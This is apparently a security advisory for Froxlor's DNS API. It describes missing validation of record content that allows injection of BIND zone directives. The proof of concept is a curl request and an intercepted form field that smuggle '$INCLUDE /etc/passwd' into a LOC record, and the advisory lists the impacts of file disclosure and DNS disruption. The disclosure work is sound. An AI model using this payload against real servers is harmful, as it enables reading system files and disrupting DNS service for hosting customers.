"details": "## Summary\n\nThe `DomainZones.add` API endpoint (accessible to customers with DNS enabled) does not validate the `content` field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. `$INCLUDE`) into the zone file that gets written to disk when the DNS rebuild cron job runs.\n\n## Affected Code\n\n`lib/Froxlor/Api/Commands/DomainZones.php`, lines 213-214, 253-254, 290-291, 292-293:\n\n```php\n} elseif ($type == 'LOC' && !empty($content)) {\n $content = $content; // no validation\n} ...\n} elseif ($type == 'RP' && !empty($content)) {\n $content = $content; // no validation\n} ...\n} elseif ($type == 'SSHFP' && !empty($content)) {\n $content = $content; // no validation\n} elseif ($type == 'TLSA' && !empty($content)) {\n $content = $content; // no validation\n}\n```\n\nThere is even a TODO comment at line 148 acknowledging this gap:\n```php\n// TODO regex validate content for invalid characters\n```\n\nThe content is then written directly into the BIND zone file via `DnsEntry::__toString()` (line 83 of `lib/Froxlor/Dns/DnsEntry.php`):\n\n```php\nreturn $this->record . \"\\t\" . $this->ttl . \"\\t\" . $this->class . \"\\t\" . $this->type . \"\\t\" ... . $_content . PHP_EOL;\n```\n\nAnd the zone file is written to disk in `lib/Froxlor/Cron/Dns/Bind.php` line 121:\n\n```php\nfwrite($zonefile_handler, $zoneContent . $subzones);\n```\n\n## PoC\n\nAs a customer with DNS management enabled and an API key, add a LOC record with injected BIND directives:\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n -H 'Content-Type: application/json' \\\n -d '{\"command\":\"DomainZones.add\",\"params\":{\"domainname\":\"example.com\",\"type\":\"LOC\",\"content\":\"0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd\"}}' \\\n https://panel.example.com/api.php\n```\n\nAlternatively via the web UI, intercept the DNS editor form POST and set `dns_content` to `0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd` and `dns_type` to `LOC`.\n\nAfter the DNS rebuild cron runs, the resulting zone file at `{bindconf_directory}/domains/example.com.zone` will contain:\n\n```\n@\t18000\tIN\tLOC\t0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd\n```\n\nBIND will process the `$INCLUDE` directive and attempt to parse `/etc/passwd` as zone data. While most lines will fail to parse as valid records, the file content is readable by the BIND process (running as `bind`/`named` user), confirming file existence and potentially leaking parseable lines as DNS records.\n\n## Impact\n\n1. **Information Disclosure**: The `$INCLUDE` directive lets a customer read world-readable files on the server through the DNS subsystem. The zone content (including included files) is visible to the customer via the `DomainZones.get` API call or the DNS editor in the web UI.\n\n2. **DNS Service Disruption**: Malformed zone content can cause BIND to fail to load the zone, causing DNS outage for the affected domain. Injecting `$GENERATE` directives could create massive record sets for amplification attacks.\n\n3. **Zone Data Manipulation**: Arbitrary DNS records can be injected by breaking out of the current record line with newlines, allowing the customer to create records that were not intended.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments